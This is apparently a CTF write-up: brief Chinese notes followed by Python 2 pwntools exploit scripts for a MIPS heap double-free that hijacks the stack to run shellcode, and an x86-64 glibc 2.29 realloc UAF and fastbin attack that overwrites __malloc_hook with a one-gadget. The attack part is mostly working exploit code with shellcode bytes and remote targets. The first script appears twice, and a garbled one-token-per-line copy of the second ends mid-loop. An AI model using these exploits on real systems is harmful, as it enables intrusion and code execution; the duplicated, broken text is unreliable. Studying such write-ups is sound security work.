比赛刚刚结束,把wp放出来
在stack布置fake chunk,然后利用double free劫持stack,覆盖返回地址执行shellcode
编辑功能时,realloc(0)后指针未清空,造成UAF
利用残留指针泄露libc heap地址
然后利用realloc造成UAF,从而构成double free
在chunk中布置fake chunk,利用fastbin attack指过去,从而造成堆块重叠,获得任意地址读写
然后修改free_hook为setcontext+53进行ORW
# Exploit script for the first challenge in this write-up (a MIPS32
# little-endian service). Per the write-up: a fake chunk is placed on the
# stack, a double free redirects an allocation onto it, and the saved
# return address is overwritten so the planted shellcode runs.
# NOTE(review): Python 2 code — str literals serve as byte buffers
# (p32/u32, ljust with '\0'); it will not run unchanged on Python 3.
from PwnContext import *
try:
    # Optional interactive shell helper; nothing below uses it.
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    context(arch='mips', os='linux', endian='little', word_size=32)

    # Thin wrappers over the PwnContext tube `ctx` (presumably exported by
    # the star import above — not visible here). Everything sent is passed
    # through str(). Several of these (s, sl, dbg, uu32, uu64) and lg()
    # are template boilerplate and are not used in this script.
    s = lambda data: ctx.send(str(data))
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs: ctx.debug(gdbscript=gs, **kwargs)
    # Unpack values shorter than a word, NUL-padded on the right.
    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    # CTF target as published in the write-up.
    ctx.remote = ('121.36.166.138', 8893)

    def lg(s, addr):
        """Print a labelled address in bold red (ANSI escapes)."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))

    # Menu wrappers. The prompts ('ice\n', '\n', 'n') are whatever the
    # service prints; options 1/2/3 are add/delete/edit.
    def add(idx, content='\n'):
        """Menu option 1: create entry `idx` with `content` (sent raw)."""
        sla('ice\n', 1)
        sla('\n', idx)
        sa('\n', content)

    def delete(idx):
        """Menu option 2: free entry `idx`."""
        sla('ice\n', 2)
        sla('n', idx)

    def edit(content):
        """Menu option 3: overwrite the editable buffer with `content`."""
        sla('ice\n', 3)
        sa('\n', content)

    rs('remote')

    # MIPS32 shellcode bytes as given in the write-up; it is what the
    # hijacked return address eventually jumps to.
    shellcode = '\x69\x6e\x02\x3c\x2f\x62\x42\x34\0\0\xa2\xaf\x68\0\x02\x3c\x2f\x73\x42\x34\x04\0\xa2\xaf\0\0\xa4\x27\xab\x0f\x02\x24\0\0\x05\x24\0\0\x06\x24\x0c\0\0\0'
    # libc-based addresses; computed but never referenced below.
    system = 0x3fcb4 + 0xf66cd000
    bin_sh = 0x157d6c + 0xf66cd000

    sla('o!\n', shellcode)
    # The service prints a stack address as 8 hex digits after '0x'.
    ru('0x')
    stack = int(r(8), 16)

    # Canary leak: the 0x21-byte edit runs up to the canary, so the line
    # read back ends with its upper three bytes; the low byte is restored
    # as 0x00 (presumably the canary's terminating NUL — TODO confirm).
    edit('e' * 0x21)
    canary = u32(ru("\n", drop=False)[-4:-1].rjust(4, "\x00"))

    # Restore the canary and plant a fake chunk header (size 0x41) on the
    # stack — the "fake chunk on the stack" step of the write-up.
    edit(p32(0) * 7 + p32(0x41) + p32(canary))

    # Double free: entry 1 is freed twice, with entry 2 freed in between.
    add(1, '\n')
    add(2, '\n')
    delete(1)
    delete(2)
    delete(1)

    # Steer the allocator toward the fake chunk at stack+0x20, then drain
    # the intervening allocations.
    add(4, p32(stack + 0x20))
    add(5, '\n')
    add(6, '\n')
    # This allocation lands on the stack: keep the canary intact and point
    # the saved return address at stack+0x34, presumably where the
    # shellcode bytes of this same payload end up — TODO confirm.
    add(7, p32(canary) + p32(0) + p32(stack + 0x34) + shellcode)

    # Option 4 presumably returns from the function whose frame was
    # rewritten, which is what runs the shellcode.
    sla('ice', 4)
    irt()
# Exploit script for the first challenge in this write-up (a MIPS32
# little-endian service). Per the write-up: a fake chunk is placed on the
# stack, a double free redirects an allocation onto it, and the saved
# return address is overwritten so the planted shellcode runs.
# NOTE(review): Python 2 code — str literals serve as byte buffers
# (p32/u32, ljust with '\0'); it will not run unchanged on Python 3.
from PwnContext import *
try:
    # Optional interactive shell helper; nothing below uses it.
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    context(arch='mips', os='linux', endian='little', word_size=32)

    # Thin wrappers over the PwnContext tube `ctx` (presumably exported by
    # the star import above — not visible here). Everything sent is passed
    # through str(). Several of these (s, sl, dbg, uu32, uu64) and lg()
    # are template boilerplate and are not used in this script.
    s = lambda data: ctx.send(str(data))
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs: ctx.debug(gdbscript=gs, **kwargs)
    # Unpack values shorter than a word, NUL-padded on the right.
    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    # CTF target as published in the write-up.
    ctx.remote = ('121.36.166.138', 8893)

    def lg(s, addr):
        """Print a labelled address in bold red (ANSI escapes)."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))

    # Menu wrappers. The prompts ('ice\n', '\n', 'n') are whatever the
    # service prints; options 1/2/3 are add/delete/edit.
    def add(idx, content='\n'):
        """Menu option 1: create entry `idx` with `content` (sent raw)."""
        sla('ice\n', 1)
        sla('\n', idx)
        sa('\n', content)

    def delete(idx):
        """Menu option 2: free entry `idx`."""
        sla('ice\n', 2)
        sla('n', idx)

    def edit(content):
        """Menu option 3: overwrite the editable buffer with `content`."""
        sla('ice\n', 3)
        sa('\n', content)

    rs('remote')

    # MIPS32 shellcode bytes as given in the write-up; it is what the
    # hijacked return address eventually jumps to.
    shellcode = '\x69\x6e\x02\x3c\x2f\x62\x42\x34\0\0\xa2\xaf\x68\0\x02\x3c\x2f\x73\x42\x34\x04\0\xa2\xaf\0\0\xa4\x27\xab\x0f\x02\x24\0\0\x05\x24\0\0\x06\x24\x0c\0\0\0'
    # libc-based addresses; computed but never referenced below.
    system = 0x3fcb4 + 0xf66cd000
    bin_sh = 0x157d6c + 0xf66cd000

    sla('o!\n', shellcode)
    # The service prints a stack address as 8 hex digits after '0x'.
    ru('0x')
    stack = int(r(8), 16)

    # Canary leak: the 0x21-byte edit runs up to the canary, so the line
    # read back ends with its upper three bytes; the low byte is restored
    # as 0x00 (presumably the canary's terminating NUL — TODO confirm).
    edit('e' * 0x21)
    canary = u32(ru("\n", drop=False)[-4:-1].rjust(4, "\x00"))

    # Restore the canary and plant a fake chunk header (size 0x41) on the
    # stack — the "fake chunk on the stack" step of the write-up.
    edit(p32(0) * 7 + p32(0x41) + p32(canary))

    # Double free: entry 1 is freed twice, with entry 2 freed in between.
    add(1, '\n')
    add(2, '\n')
    delete(1)
    delete(2)
    delete(1)

    # Steer the allocator toward the fake chunk at stack+0x20, then drain
    # the intervening allocations.
    add(4, p32(stack + 0x20))
    add(5, '\n')
    add(6, '\n')
    # This allocation lands on the stack: keep the canary intact and point
    # the saved return address at stack+0x34, presumably where the
    # shellcode bytes of this same payload end up — TODO confirm.
    add(7, p32(canary) + p32(0) + p32(stack + 0x34) + shellcode)

    # Option 4 presumably returns from the function whose frame was
    # rewritten, which is what runs the shellcode.
    sla('ice', 4)
    irt()
# Exploit script for the second challenge in this write-up (x86-64,
# glibc 2.29 judging by the library directory below). Per the write-up:
# an edit with size 0 goes through realloc(0) and leaves the entry pointer
# dangling (UAF); the stale pointer leaks heap/libc addresses and yields a
# double free, and a fastbin attack then gives an arbitrary write.
# NOTE(review): the prose says __free_hook is set to setcontext+53 for
# ORW, but this script writes a one-gadget into __malloc_hook instead.
# NOTE(review): Python 2 code — str literals serve as byte buffers.
from PwnContext import *
try:
    # Optional interactive shell helper; nothing below uses it.
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # Thin wrappers over the PwnContext tube `ctx` (presumably exported by
    # the star import above — not visible here). Everything sent is passed
    # through str(). s, sl, uu32 are template boilerplate unused here.
    s = lambda data: ctx.send(str(data))
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs: ctx.debug(gdbscript=gs, **kwargs)
    # Unpack values shorter than a word, NUL-padded on the right.
    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    ctx.binary = './pwn'
    # Local copy of the remote libc so offsets match while debugging.
    ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.29-0ubuntu2_amd64'
    # CTF target as published in the write-up.
    ctx.remote = ('119.3.89.93', 8015)
    ctx.debug_remote_libc = True
    # Debugger conveniences (binary-relative offsets); only relevant
    # when dbg() attaches.
    ctx.symbols = {'node': 0x4040,}
    ctx.breakpoints = [0x17D6]

    def lg(s, addr):
        """Print a labelled address in bold red (ANSI escapes)."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))

    # Menu wrappers: option 1 add, 2 edit, 3 delete, 4 show. Prompts are
    # whatever the service prints ('ice', 'index', 'size', 'content').
    def add(idx, size, content='\n'):
        """Menu option 1: allocate entry `idx` of `size` bytes holding `content`."""
        sla('ice', 1)
        sla('index', idx)
        sla('size', size)
        sa('content', content)

    def delete(idx):
        """Menu option 3: free entry `idx`."""
        sla('ice', 3)
        sla('index', idx)

    def show(idx):
        """Menu option 4: print entry `idx`."""
        sla('ice', 4)
        sla('index', idx)

    def edit(idx, size, content='\n'):
        """Menu option 2: resize entry `idx` to `size` and, unless size is 0,
        send new content. size 0 is the realloc(0) path the write-up
        identifies as the bug: the entry is freed but its pointer stays."""
        sla('ice', 2)
        sla('index', idx)
        sla('size', size)
        if size != 0:
            sa('content', content)

    rs('remote')

    add(0, 0x10)
    add(2, 0x10)
    add(3, 0x10)
    delete(3)
    # UAF: resize entry 0 to 0, then show what the dangling pointer reads.
    edit(0, 0)
    show(0)
    # Low 6 bytes of a heap pointer; 0x2c0 is the challenge-specific
    # distance to the heap base.
    heap_base = uu64(ru('\n', drop=True)[-6:]) - 0x2c0
    lg('heap_base', heap_base)

    # Seven 0x10 allocations freed in turn — presumably filling the tcache
    # bin for this size (glibc 2.29 keeps 7 per bin) so later frees reach
    # the fastbin, which is what the write-up's "fastbin atk" needs.
    for i in range(7):
        add(10 + i, 0x10)
    for i in range(7):
        delete(10 + i)
    # Free entry 2 through realloc(0), then edit it again via the stale
    # pointer so the freed chunk points at heap_base+0x250 (the fake chunk
    # of the write-up).
    edit(2, 0)
    edit(2, 0x10, p64(heap_base + 0x250))
    add(4, 0x10)
    add(5, 0x10)

    # Menu option 666 prints a 'gift' libc address (14 hex digits);
    # 0x264140 is the challenge-specific offset to the libc base.
    sla('ice', 666)
    ru('gift: ')
    libc_base = int(r(14), 16) - 0x264140
    one = libc_base + 0x106ef8          # one-gadget in this libc (by name)
    malloc_hook = libc_base + 0x1e4c30  # __malloc_hook in this libc
    sla('string: ', 'aaa')

    # Same pattern at size 0x5f: eight allocations, seven freed, then the
    # eighth (entry 27) freed via realloc(0) and re-edited through the
    # stale pointer to aim at a fake chunk just below __malloc_hook.
    for i in range(8):
        add(20 + i, 0x5f)
    for i in range(7):
        delete(20 + i)
    edit(27, 0)
    edit(27, 0x5f, p64(malloc_hook - 0x23))
    # Debugger attach left in; under rs('remote') its effect depends on
    # PwnContext — TODO confirm it is a no-op remotely.
    dbg()
    add(30, 0x5f)
    # Second allocation overlaps __malloc_hook: 0x13 bytes of padding,
    # then the one-gadget address. The next allocation presumably fires it.
    add(31, 0x5f, '\0' * 0x13 + p64(one))
    irt()
# Template preamble: pull the PwnContext helpers into the namespace and
# optionally make an IPython shell available for interactive debugging.
from PwnContext import *
try:
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.binary
=
'./pwn'
ctx.custom_lib_dir
=
'/home/iddm/glibc-all-in-one/libs/2.29-0ubuntu2_amd64'
ctx.remote
=
(
'119.3.89.93'
,
8015
)
ctx.debug_remote_libc
=
True
ctx.symbols
=
{
'node'
:
0x4040
,
}
ctx.breakpoints
=
[
0x17D6
]
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(idx,size,content
=
'\n'
):
sla(
'ice'
,
1
)
sla(
'index'
,idx)
sla(
'size'
,size)
sa(
'content'
,content)
def
delete(idx):
sla(
'ice'
,
3
)
sla(
'index'
,idx)
def
show(idx):
sla(
'ice'
,
4
)
sla(
'index'
,idx)
def
edit(idx,size,content
=
'\n'
):
sla(
'ice'
,
2
)
sla(
'index'
,idx)
sla(
'size'
,size)
if
size !
=
0
:
sa(
'content'
,content)
rs(
'remote'
)
add(
0
,
0x10
)
add(
2
,
0x10
)
add(
3
,
0x10
)
delete(
3
)
edit(
0
,
0
)
show(
0
)
heap_base
=
uu64(ru(
'\n'
,drop
=
True
)[
-
6
:])
-
0x2c0
lg(
'heap_base'
,heap_base)
for
i
in
range
(
7
):
add(
10
+
i,
0x10
)
for
i
in
range
(
7
):
delete(
10
+
i)